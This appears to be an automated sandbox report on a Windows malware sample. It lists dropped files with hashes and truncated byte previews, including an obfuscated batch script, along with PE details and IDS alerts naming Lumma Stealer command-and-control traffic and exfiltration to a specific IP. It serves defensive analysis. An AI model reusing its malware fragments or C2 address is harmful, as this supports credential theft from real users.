Process:	C:\Users\user\AppData\Local\Temp\PasoCattle.exe
File Type:	data
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	7.9975626227798315
Encrypted:	true
SSDEEP:	1536:cQ36ddIs69BLJSqA8PWfAx/lruBD5hf6akJGg1lg+xM4Zl:cQlF9oAjrO4G+a+xMyl
MD5:	832042466014761981CDAF193F0E7041
SHA1:	301225CDE7E7DE3A10E98D7C9DE191D85AAC0099
SHA-256:	FF5E35AC52EA87EC94D3847112D9F3083B3BF252FA74C76D453EE118BA1A2BE8
SHA-512:	2A49ECD5DE8702A71267463B8CD130F1AA91D1E3F8D9EB866B8C58C8FC46374F98AECDCDCD071D207F734A61D082AAA56170152EEDA3C0E445C0A5CCD6A50260
Malicious:	false
Preview:	..2O;.....=F.u...~X.^tu4ey?...v............E=.....U..x...'...=.g.....=..".......C-..}...8...8.Br..g]....M.-.>.r,...I.......!.5..f.4...FV.U.,.%zY...~.ysqV..V...I...?...)..zRsa...#.G..C.pqe.b{.:%k.y...)..Y..-<.n.J/<gkN..m.\.L.I.VIC q.rc..YMn%<....O.......4.....J..C,s..U.{N.z.pAU..dX...M.7.$1...a..&..\|89...}).g...F.e.p.....&..P..t.0......64.$)...K..f2.!.P.P...A...~..G..!.M.f.f..._...i..U.<..@9 .....2.FN.`....fT..#[...\9.0.kO.S.^A.....K:.....a.AES2...ps$.8F5... UF......(.X=Ha............s.rb.._f.A...q....#.....M..T...qj:...$0Y...P...r..o..].m.f.>.1_\|.p76.........a..6.>G.a.....c...]u+.$....v. 3[-e...D.kw. ..Y.O.a.BsW....E...bw`..Y.7>...<......e.....a..E...Vy..#u3..A.YW......~......w.-P..)S..4.J...k..JZ.\.HR..V...y....q..jB..@.G@-..Q5."[.&A.J!....F.'J4..>.......< ........@..c5/K.y.....S......?.3.Q...2M........?~....GQ0.k8.{5[.P\WY..7....k.wc.JA.k..77"^a.n...I.#....J.M..p!....t=z..?W .Iqi...b..!PDv...)3.....;,#.uH2...X....+..<.G;hM......$.Npr.e....\|.

C:\Users\user\AppData\Local\Temp\Rat

Download File

Process:	C:\Users\user\AppData\Local\Temp\PasoCattle.exe
File Type:	data
Category:	dropped
Size (bytes):	100352
Entropy (8bit):	7.9982884825197775
Encrypted:	true
SSDEEP:	1536:qIl7/T+lGxZhNlCtHtyAtgvWscqQlxaDOgASCZ5FSJqz7D6qAK8KxGBpM:xZL33R0HtyA+RQlKOmxw/D8KxGBpM
MD5:	CD00C53F92FBED3C8947B7205A4247ED
SHA1:	87D5486B7EFD98DCC92B4393D20D39D12CB6487E
SHA-256:	EDD50131DA69EA2747D0BCA3ECD4293778BEB5491FBF02BF6D4ADA4B2E9F01C1
SHA-512:	D1C7AAD1E7F376C7622031D36A3C1F2452B693E5FA976B35CFC22045180388B55218FA8C2B0270C2F66C996B805112C6D82F312642809D9051F350AE1220A85E
Malicious:	false
Preview:	..t!@xF.....U...-p.....)..1^....Y.....w...z..(.....b.$\X..2..#.....6c..@...\.E$R.u....Z.]..<`..v...9.a.W..N?=...6..d._......9.~.5~.....Jd...~0h'.............bf.6....Q.I........J.U.d......I...\.'J..m..).n.,S.../................$.j.....,L.-....`s2..2...V........U.6.\./U~...y...K..2.i.z...l.k.EQ..+.=.....E]T.\Y.?.C..'.m...hP.'.M..mc....:}.e6-^.g..$...o.k.b]!@...Vl.,.e.O.....9S.?..MA......\|...U?].....D..f....D=....za.Nf......46.I......>..../T(6...L..B..Y.8.3B..J.[S..@........%..^..e$.ck......b.h.....Y.$:.K_p}c.;i..C.}..O.D \|.&...f\|n.......yq....#\|..B..T..F....t..R~)d)<.N.0......tp.9..~Co.....W.n.(1.).y...%_.......Y....D(..b....>..)^....dGX..iA.9...n.H8...pn...D...\.......a5.t\<1.N..=.......v..e.q.M.W..]....a.-7~*BO.k..j...\|3.}_2jz.A3.X.-3(.fN\.4.>J......yG...om......f....v..uCP...+g...i.IU{R..Be8.....o5...=...k.n`(..m..w..S.9.@..l.ri...U?..ctD+...+S...u.e;..G.G.=3S,.S.......q....M.U/z.>..y..k....e..J&4$.z.....[B..J.Ax0..!]fr....M..Ry

C:\Users\user\AppData\Local\Temp\Receiver

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	88064
Entropy (8bit):	5.844749716437728
Encrypted:	false
SSDEEP:	1536:xj62SfuVGHj1vtK7h6R8anHsWccd0vtmgMbFuz08QuklMBNIimuzaAwug:xjfTq8QLeAg0Fuz08XvBNbjaAtg
MD5:	7A1D29A789B8F5CA0F4186AA1DBC3BC2
SHA1:	A9A3169FF90FA2BFFB8D96F95FFDB3A70386B476
SHA-256:	A513073A8C2E7F41CF78374498C2D980CD8DA473246AF5475C53C1D7FA7BA0DE
SHA-512:	AD90D9521F68AFFDA3AD4CCA4ECF1A72C3CFCB465F3D60FB8BCB02FFACD3ABD9F1DBF03C022F13FC68DA74080355CE36C0B13D4E511E0857AF60C30B2032D3A0
Malicious:	false
Preview:	..F.. r.^].U..QS.].V.u..U..C.W....Cx.<H....b....}....0....{P.........w.E.;........C\|......E.;...(.....2.....%....=....u....#....#....................%....=....u....#....#.....................L..............M.,K.;.t-.....K...;.t ......K....@.K...;..........;.u......E.;}...F...+U......u..~.+.N;S\|sa........E.=....w..C<.]......]..].......w..C<....9M.u1.........~..[\|N;.s.............f;.u......j.X....._^[..U..QQSV.u...M.W..xQ;u.}L.D..+..E....E....P.......Y..u.j..+...E..u...HQW.R...E....3.f..8.M..E..9..j.X_^[..U....SVW....3.B.....#.M.......sQ.......u%f..u....L.............j..T>.X....3...f..t...........T8.t..E.........j.Y..".t... ...f...........E......}..E......U.3.E.B.......f;.u<....}..t&%....=....u.........#.#..............;...........j.Xf;..........}..tZ..%....j.[=....u.........#.#....................%....=....u"............%....................;.r.;...r...3.B...j.Yf....'....E._^[..E......L.....E....E.,K..E.3.f;].....E..E.....2....$...I.j.Xf;..........K.<.......<....

C:\Users\user\AppData\Local\Temp\Reflect

Download File

Process:	C:\Users\user\AppData\Local\Temp\PasoCattle.exe
File Type:	Microsoft Cabinet archive data, 488808 bytes, 9 files, at 0x2c +A "Cooked" +A "Receiver", ID 6076, number 1, 29 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	488808
Entropy (8bit):	7.998475465922649
Encrypted:	true
SSDEEP:	12288:ohQLaKCeh787wflZffn5DMrTn1GF1MwTYcOkxFdryB:PaenflZ1iT1CMaLLxFde
MD5:	97942C5C8DFF98863EFC71FC15CE0257
SHA1:	14D6BA8E5C3B7BE1BE540CA7ECAA075D5C505E3B
SHA-256:	B4A2CBEAA8185681ED75BDF2C34020CCAA9405A42A47C4C3D17EC6E907FD9152
SHA-512:	7D1FABB306D3CD38985CE6472DF17973AEE7F4D56902D48A1CF690BBAF8D5BA71D83DD79136FCA635AB51813FC3978E9871DECAD0E07D46BEE5A998E5CB77D6F
Malicious:	false
Preview:	MSCF....hu......,......................................Y<. .Cooked..X.........Y<. .Receiver..(...@.....Y<. .Attractions.Q....h.....Y<. .Fingers..D..Q;.....Y<. .User.....Q......Y<. .Pot.....Q......Y<. .Alt.....Q......Y<. .Articles..T..] .....Y<. .Specialty./.s6.R..CK...xT..0\|f.$9$.3.."..:Z...pI.. L.Bp..........s.h.BO.9lF..V..Z..V........./.D..$"mw<Q.b2.....$...?...}Y{..../..;0R.......G...H....E.........r..wX..A)$KZ.........f..<../....Z.............ul....Z+..i)={.'.....PW..6OO5<..s.(....k.c...N.s.Z.g.."E..KH....k....%:6A;Cj...^.O..P.m.8._.3b.......?...Z..T..V.O...I....kEA.E&.\|..}...."...7...0."....Ep(...`8....Y;t+..y...&K ]RS.h.4...0AP.<Z..J..V.Pwmx.FE...,.uJm./.......k ...V....B....!u..ix.a.H.;.......gGM......bs..D..7....Q.....Id.S..4.{....*.(7..:.ym....wB)z..^C....15%\|.Ru.....\.[8.....'@9j~..E...p&.]..)0...Lzz%..m....w..Z8.Og...d.....%.B.D...t..~$6.... .C..Qs..z..............h..=..)....4H+`.v"5W.....h.....X..>O...}5m.lj......&..U?.1.....WN...,tC.IN.6+....

C:\Users\user\AppData\Local\Temp\Set-up.exe

Download File

Process:	C:\Users\user\Desktop\vUcZzNWkKc.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	6851208
Entropy (8bit):	6.451509958428788
Encrypted:	false
SSDEEP:	98304:ty1CDpiB/weoINcERH7q/70/ske9dKVyz8SC:jViB/NooB7edGG8SC
MD5:	2A99036C44C996CEDEB2042D389FE23C
SHA1:	4F1E624BCC030E44722DE26B72C8156BF57E14E8
SHA-256:	73AA5EE19F0EA048DCFF2F44D6FD5AC41C13E2D7E61371459E756836F72CAD43
SHA-512:	6907CD0E47293C8C96345ED00F2F3FA2241CE1671EE73A599837857BFB39F6C7E373AAD843CC78FB550D2DB10BDFE066A021CEC4C8A49AECDF06A7E71EDADEDD
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 70%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5mg...............(.hK...h..2............K...@...........................i......h...@... ..............................`e..-....................h.......e.`L...........................0d......................he. ............................text....gK......hK.................`..`.data...D(....K..*...lK.............@....rdata........O.. ....O.............@..@.eh_framdM....d..N....d.............@..@.bss.....1... e..........................idata...-...`e.......e.............@....CRT....0.....e......2e.............@....tls..........e......4e.............@....reloc..`L....e..N...6e.............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Specialty

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	152576
Entropy (8bit):	6.433958275406592
Encrypted:	false
SSDEEP:	3072:UZg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laW2UDQWf05mjD:UK5vPeDkjGgQaE/loUDtf0aD
MD5:	D49F624EA007E69AFE1163955DDBA1BB
SHA1:	EE35A9CEAB1F6A40694B26094FDC7727658293D2
SHA-256:	4052653CEDFD2F560DA3BEE9825F88F60DBD053ABB3C064F3D19D98863B2962C
SHA-512:	63B1629E79C35E59923D4A1C12B93FEB45241EB0D2B59A03B9EB14BF76DAA82BA124710E8F4AA157D0C63BADFDCFFD916F049B85DE4B52CAA143F0DD32AD71E8
Malicious:	false
Preview:	hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B.........................................................................................................................................................................................................................................................................................................t.M.....hi'D......Y.hs'D......Y..r...hx'D......Y..\|X..h}'D......Y.Q.I...h.'D.....Y.0$M.Q.@..0$M.P.=B..h.'D.....Y...C..h.'D.....Y.....h.'D..}...Y..+O..h.'D..l...Y..!...h.'D..[...Y.45M....h.'D..E...Y.U....SVW.}.....e....E..E..w..

C:\Users\user\AppData\Local\Temp\Symposium

Download File

Process:	C:\Users\user\AppData\Local\Temp\PasoCattle.exe
File Type:	ASCII text, with very long lines (1070), with CRLF line terminators
Category:	dropped
Size (bytes):	25405
Entropy (8bit):	5.118149909201556
Encrypted:	false
SSDEEP:	384:PALCiiNosKwu7ZXl+pn6ZkoUJJyL0pwyYSYrtNdVi5f9EQoVV2jUDnQycptEbVOt:PA55wEwp6iJY0GyYNVi5fq+jhrkRSdf
MD5:	23812A6E32E38911133B221F39F9A20B
SHA1:	5B3B155889AB3A04ABDD1F195753E817ED3FDB23
SHA-256:	D4913EAF90D499344DE0A1B21B97392DC09B3C3A7C503E544EFDD12CD4C289CF
SHA-512:	02F1BB5D6016076451B84C84CF8FD09FC62BD33EDBAE6A4EFF0BE94DF56652B14E321C9D098B19A52CDD9703507EBFC2A54B4812A96CD1F90F810EBC3A3D3F58
Malicious:	false
Preview:	Set Antenna=L..JNgTransport-Mail-Angola-Both-Directory-..klFlesh-Holders-Mx-Hugo-Guards-..ZhQThread-Say-Injury-Davis-Honda-..SpSoil-Wolf-True-Accidents-Theorem-Disabilities-Suggesting-Observation-..DiFSlot-Fucked-Rf-Shipping-Indianapolis-..mylSunset-Educators-Funky-..Set Content=2..VTkInd-Recorded-Dairy-Tons-Efficiency-..GCSpears-Associated-Adaptation-..BZReed-Protection-Treatment-Devel-Finish-Underwear-Earn-Recruitment-Relief-..ArpOriginal-Tigers-..SyJjPrevention-Eugene-Significant-Hair-Retail-Coding-Hospital-..InlSCottage-Vaccine-Wider-Computers-Level-Indian-Knowledge-Cleaning-..OCayChoosing-Closing-..vfWorldwide-Adequate-Notify-Icon-Vacation-Combat-Brass-..TQTaylor-..Set Advertisers=R..ndDenied-Weekend-Ticket-Like-Powerful-Intent-Olympic-..xyvvProved-Anonymous-Moved-Sword-Cargo-Employees-Foods-..hcpPossibly-Technology-Off-China-Biblical-Consolidated-Stan-..TCRoute-Essays-..vIqAGrades-August-Calculations-Rounds-Dk-Handjobs-Mali-Central-Columbus-..aYDKAcademy-Monitored-Accept-Parliame

C:\Users\user\AppData\Local\Temp\Symposium.cmd (copy)

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (1070), with CRLF line terminators
Category:	dropped
Size (bytes):	25405
Entropy (8bit):	5.118149909201556
Encrypted:	false
SSDEEP:	384:PALCiiNosKwu7ZXl+pn6ZkoUJJyL0pwyYSYrtNdVi5f9EQoVV2jUDnQycptEbVOt:PA55wEwp6iJY0GyYNVi5fq+jhrkRSdf
MD5:	23812A6E32E38911133B221F39F9A20B
SHA1:	5B3B155889AB3A04ABDD1F195753E817ED3FDB23
SHA-256:	D4913EAF90D499344DE0A1B21B97392DC09B3C3A7C503E544EFDD12CD4C289CF
SHA-512:	02F1BB5D6016076451B84C84CF8FD09FC62BD33EDBAE6A4EFF0BE94DF56652B14E321C9D098B19A52CDD9703507EBFC2A54B4812A96CD1F90F810EBC3A3D3F58
Malicious:	false
Preview:	Set Antenna=L..JNgTransport-Mail-Angola-Both-Directory-..klFlesh-Holders-Mx-Hugo-Guards-..ZhQThread-Say-Injury-Davis-Honda-..SpSoil-Wolf-True-Accidents-Theorem-Disabilities-Suggesting-Observation-..DiFSlot-Fucked-Rf-Shipping-Indianapolis-..mylSunset-Educators-Funky-..Set Content=2..VTkInd-Recorded-Dairy-Tons-Efficiency-..GCSpears-Associated-Adaptation-..BZReed-Protection-Treatment-Devel-Finish-Underwear-Earn-Recruitment-Relief-..ArpOriginal-Tigers-..SyJjPrevention-Eugene-Significant-Hair-Retail-Coding-Hospital-..InlSCottage-Vaccine-Wider-Computers-Level-Indian-Knowledge-Cleaning-..OCayChoosing-Closing-..vfWorldwide-Adequate-Notify-Icon-Vacation-Combat-Brass-..TQTaylor-..Set Advertisers=R..ndDenied-Weekend-Ticket-Like-Powerful-Intent-Olympic-..xyvvProved-Anonymous-Moved-Sword-Cargo-Employees-Foods-..hcpPossibly-Technology-Off-China-Biblical-Consolidated-Stan-..TCRoute-Essays-..vIqAGrades-August-Calculations-Rounds-Dk-Handjobs-Mali-Central-Columbus-..aYDKAcademy-Monitored-Accept-Parliame

C:\Users\user\AppData\Local\Temp\User

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	148480
Entropy (8bit):	6.695251861322664
Encrypted:	false
SSDEEP:	3072:4cBiqXvpgF4qv+32eOyKODOSpQSAU4CE0Imbi80PtCh:4cB3gBmmLsiS+SAhClbfSCh
MD5:	A1E25E38AD59F032B7717CC6E5E00609
SHA1:	F7E7D770656E25F73BE807AC53F49776810099D5
SHA-256:	A39C8CC684FC60938C2F6CF62640F4B67F8C29A1EE75D172735B8384F8D79E8A
SHA-512:	4DDCF310A6FB0E21717A14EBD47C78043B792837F21BD13392B06D08C9D4CB974407218ECFAC94D03E23DEFFE2B6B613FB408EFB1A621913AF4D97A2424D4AEA
Malicious:	false
Preview:	f;...J....f...f;........B.f;...0....Pvf;........B.f;........Pvf;........B.f;........P...f;........B.f;........Pvf;.rw.B.f;.........Pf;.rc..Pf;........@...f;.rM.B.f;............f;.r7.B.f;.........0f;.r#..0f;.s..}........f;...o.........u.jAXf;.w.jZXf;.v.j..F.Zf;.v......t"..uWj.[.]..Oj.Z.F.f;....w... ..........M...xt...Xt...u.j.[.].P.M..A.......u.j.[.]...1..M.....E.QPj.j..M..:....M..].3.E..M.j0Xf;.......j:Zf;.s....+..........f;...k....`...f;...s....P.f;.r.....f;...]....P.f;.r..f...f;...G....P.f;.r..Bvf;...3....P.f;.r..Bvf;........P.f;...z....Bvf;........P.f;...b....Bvf;........P.f;...J....f...f;........P.f;...0....Bvf;........P.f;........Bvf;........P.f;........P...f;........P.f;........Bvf;.rw.P.f;.........Pf;.rc..Pf;........@...f;.rM.P.f;............f;.r7.P.f;.........0f;.r#..0f;.s..}........f;...o.........u.jAXf;.w.jZXf;.vUj..F.Zf;.vM............;}.s~.U..E...;..U..M.r<.u.w.;.r3;.u.;E.u.;].r%w.;}.v.....U..1j.Z.F....f;.w... ....PQ.u..u...........M...E.E..M...0....E.....V.

C:\Users\user\AppData\Local\Temp\Zone

Download File

Process:	C:\Users\user\AppData\Local\Temp\PasoCattle.exe
File Type:	data
Category:	dropped
Size (bytes):	79872
Entropy (8bit):	7.997576222410487
Encrypted:	true
SSDEEP:	1536:eLQfqgBMCPA1XlKvwsSow5tLh2bBK3M1wY6FCUN8Pn+9BlGRpjyBGHS:1ICPA11KIjP5tLsbBKM176F7NVARcBGy
MD5:	6ECD89B15DFAEE100B13F894C76F9CEE
SHA1:	CFF0D1262CAD22201D25B331AFD9EB882865767F
SHA-256:	73D440F3C827B1B041209B7C9F2FD26D3BD6A5CDA3713B86BA965BF45AA46325
SHA-512:	6452A2A3DE1EC01DDA09ADF53C92A63C6AC830B3DC61CF305C08BAF5BD8FEB14EE67BD1B2BF7B8B61A46E8D3E9B23FB4097CB4565092840F6811084C98CEBC74
Malicious:	false
Preview:	/..GG..z..>.p(.....!}..h..}..O.;....."}$48...Bk.a-,n."..n.1&.. ..........c....<i`p...'.....E3.&..Q.y......oX.W:.u.....`.....?.l..uFWV..(H.u.......H.....(%8...x,...h.i..w.y...#...\.`V'v.2..F1S+4.c.3..j.Z.r.d.b.6.h....=....yH.:.....a..m...)a...w;.=4...\i....p.'.p.$.?x....T...!G<.W4......Q.qG..B05.t..tP.E....r.S.Gx.........1~...%.6..I........4..T7...$u:...4.WC^.2v..t....E.....%....t].D....4$.U...&.h. Im..Y"{,...\|...?[9[..";6....~.$2P...Fb.....UZ^9&.....!..}."<.y...?....\|..Y........$......>.V.Be....l^.&.h%Z.f..6........3.n.Sg......MU.^&..A..=.b.......e"..5p...i..r.$.R.%.f..8.2`.C."r._..9.6-.b.y.y5n...L.W...?$......r..>.....A...q.....Q...E.c..[.Qho..C..G.....:.K.NT.mQ..$.s..y...F...=..\....Y=.r.U....P..0..._u.....ib...r.....V.(.)..R....1..k.h..[0....1r4.......T\p..<...n..;4\D+......u\|7.s2>..60...n.,... ...X..1=...N.6.pC....@l.....p...<(....../..G.t4....7wp+...r.J%...0.N....g....]..\|..n.......o.Lx..q.S...B.5],.M.H.P...@B...g.js.N.fY..9..{..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.979658742891777
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	vUcZzNWkKc.exe
File size:	7'088'640 bytes
MD5:	2882ead03a58608f2f73c66b861299a3
SHA1:	6a8adde3d6ceda99d430611a3e06a8bc6ec9bfe0
SHA256:	5866e752f869f91e6084a50c2ee65991de91b9e63f4ea9d1ac9bce9b4123a77d
SHA512:	1d14a5f1b0dcd99408fee52bc2a43f96f18fd27c345b233ffa0308f516155008ce91346c77e30f0456f7c9b40563c9d0521317ea4a60ac83abd4cd07271c57de
SSDEEP:	196608:bQPvEGHXe3iM4Jsa0S8yUf5H2RvsVhblD:snESXe3iSa8yUfNuEHbN
TLSH:	FA663305A2560BB3F09EA27AB691F8157E7EEE70D47C10A58E1FDB03E03D2497159B32
File Content Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...E.ng..................x.............. ... y...@.. .......................@......m.l...@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0xfe0000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE
Time Stamp:	0x676E9445 [Fri Dec 27 11:49:25 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007FB8E4C8E43Ah
invd
insb
add byte ptr [eax], al
add byte ptr [eax], al
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [ebx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edi], bl
add byte ptr [eax+000000FEh], ah
add byte ptr [edx], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add cl, byte ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x794055	0x69	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x792000	0x53c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x7941f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x2000	0x790000	0x518a00	f40d0e46f56f09d90e95d2faec48fcef	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x792000	0x53c	0x400	c8357ab0351293312dce1378c948d5d7	False	0.6865234375	data	5.641060222469996	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x794000	0x2000	0x200	a0232179652c49de360269397bdb9eca	False	0.150390625	data	1.0043697745670233	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x796000	0x2a2000	0x200	66a3c3da0014c486f55e7b1602e6ce62	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
ycplgdyn	0xa38000	0x1a6000	0x1a5200	1483d0871d408e276184964ab75f89b5	False	0.9944026649228258	data	7.952986238509369	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
spankfnb	0xbde000	0x2000	0x400	a5a1f34ec8d2fe043b46be4586ab72f7	False	0.767578125	data	5.988999381861949	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0xbe0000	0x4000	0x2200	852b51bfcd9cc11a65ff9c228db6069c	False	0.06089154411764706	DOS executable (COM)	0.7930240971223058	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xbdcc58	0x244	data			0.4689655172413793
RT_MANIFEST	0xbdce9c	0x256	ASCII text, with CRLF line terminators			0.5100334448160535

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-28T09:33:36.486952+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49737	172.67.128.184	443	TCP
2024-12-28T09:33:56.739542+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49737	172.67.128.184	443	TCP
2024-12-28T09:33:56.739542+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49737	172.67.128.184	443	TCP
2024-12-28T09:33:58.029226+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49741	172.67.128.184	443	TCP
2024-12-28T09:33:58.800935+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49741	172.67.128.184	443	TCP
2024-12-28T09:33:58.800935+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49741	172.67.128.184	443	TCP
2024-12-28T09:34:00.455322+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49742	172.67.128.184	443	TCP
2024-12-28T09:34:02.816452+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49743	172.67.128.184	443	TCP
2024-12-28T09:34:05.267953+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49744	172.67.128.184	443	TCP
2024-12-28T09:34:07.623320+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49745	172.67.128.184	443	TCP
2024-12-28T09:34:08.468226+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49745	172.67.128.184	443	TCP
2024-12-28T09:34:09.995549+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49747	172.67.128.184	443	TCP
2024-12-28T09:34:13.558667+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49754	172.67.128.184	443	TCP
2024-12-28T09:34:14.403022+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49754	172.67.128.184	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 28, 2024 09:33:14.661371946 CET	49730	443	192.168.2.4	3.218.7.103
Dec 28, 2024 09:33:14.661411047 CET	443	49730	3.218.7.103	192.168.2.4
Dec 28, 2024 09:33:14.661489964 CET	49730	443	192.168.2.4	3.218.7.103
Dec 28, 2024 09:33:14.664239883 CET	49730	443	192.168.2.4	3.218.7.103
